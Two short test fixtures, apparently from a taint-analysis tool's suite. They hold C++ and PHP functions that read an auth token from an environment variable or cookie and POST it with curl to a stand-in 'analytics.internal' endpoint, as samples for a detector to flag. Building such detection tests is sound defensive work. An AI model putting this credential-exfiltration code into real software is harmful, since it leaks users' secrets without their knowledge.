File: tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.cpp
#include <curl/curl.h>
#include <cstdlib>

void leak_env() {
    const char *token = std::getenv("AUTH_TOKEN");
    if (!token) return;

    CURL *curl = curl_easy_init();
    curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track");
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token);
    curl_easy_perform(curl);
    curl_easy_cleanup(curl);
}

File: tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.php
<?php

function leak_session() {
    $token = $_COOKIE['auth_token'];
    $ch = curl_init('https://analytics.internal/track');
    curl_setopt($ch, CURLOPT_POSTFIELDS, "session={$token}");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_exec($ch);
    curl_close($ch);
}
